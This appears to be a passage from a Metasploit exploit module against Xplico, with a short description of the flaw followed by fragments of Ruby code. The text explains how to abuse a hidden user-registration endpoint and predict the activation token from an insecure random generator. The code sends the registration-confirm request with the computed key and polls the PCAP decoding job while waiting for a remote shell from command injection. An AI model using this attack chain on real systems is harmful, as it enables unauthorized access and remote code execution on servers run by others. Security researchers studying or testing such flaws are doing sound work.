The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation. But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.

def check # There is no exact way to understand validity of vulnerability without registering new user as well as trigger the command injection. # which is not something we want to do for only check..! res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'users', 'register'), ) if res && res.code == 302 Exploit::CheckCode::Safe else Exploit::CheckCode::Unknown end end

# We need to follow redirections. Even if we managed to find em_key. # It will redirect us to the login form. We need to see registration completed on final page. res = send_request_cgi!( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'users', 'registerConfirm', em_key), 'cookie' => @cookie )

# We can not wait all the day long to have session. # So we are checking status of decoding process 5 times with sleep for a 1 second on each loop. is_job_done = nil counter = 0 until session_created? || !is_job_done.nil? || counter == 5 res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id), 'cookie' => @cookie, ) if res && res.body.include?('File uploaded, wait start decoding...') print_status('Parsing has started. Wait for parser to get the job done...') end if res && res.body.include?('DECODING') print_good('We are at PCAP decoding phase. Little bit more patience...') end # Tbh decoding process is not going to be finished as long as we have msf session. # We are not going to see this case if we are successful exploiting. if res && res.body.include?('DECODING COMPLETED') print_warning('PCAP parsing process has finished. Haven\'t you got your shell ?') is_job_done = 1 next end sleep(1) counter += 1 end